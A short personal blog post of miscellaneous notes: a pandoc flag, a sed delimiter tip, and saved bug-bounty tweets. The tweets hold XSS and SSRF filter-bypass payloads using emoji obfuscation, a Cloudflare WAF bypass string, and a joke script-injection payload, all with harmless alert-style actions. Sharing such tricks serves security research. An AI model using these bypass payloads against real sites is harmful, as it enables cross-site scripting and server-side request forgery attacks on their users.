mikebell.xyz


If you need a Computer Science tutor, code reviewer, or someone to pair program with, click here


June 5, 2019

I don’t know what the title of this one is yet.

This format will be more like my “mind dump”-type posts.

TIL pandoc has a --ascii flag. This fixes the conversion of single-quotes to unicode apostrophes.


I have a lot of Twitter backlog to harvest:

You can bypass xss & open redirect or ssrf protections whit emojis
Ex:
javas♥️c😂ript:prompt`1`
ht🕸️tp://12🎀7.0.0.1

#writeup  Google bug bounty: LFI on production servers in 
(link: http://springboard.google.com) springboard.google.com – $13,337 USD

Short story about why u must always check for dirs in 302 status pages
because you will surprise that some directories listing will work

(link: https://omespino.com/write-up-google-bug-bounty-lfi-on-production-servers-in-redacted-google-com-13337-usd/) 
omespino.com/write-up-googl…

#Bugbounty #infosec

Cloudflare WAF events Bypass:  if ><tag onxxxx=alert(1)> is filtered, 
try ><tag onxxxx=a;alert(1)> and your done #bugbounty #infosec

sed(1) can use delimiters other than slash. Especially useful when you 
want to match a url, like:

sed -i 's#http://example.local/foo##' urls.txt

What if researchers hit vulnerable open services online with spoilers? 
Or used them in PoCs for exploits when submitting bug bounties?

echo -e "\033[0;31mSnape kills Dumbledore" | nc -nv ...

"><script>confirm("Thanos Marries Tony Stark");</script><!--

If you need a Computer Science tutor, code reviewer, or just someone to pair program with, click here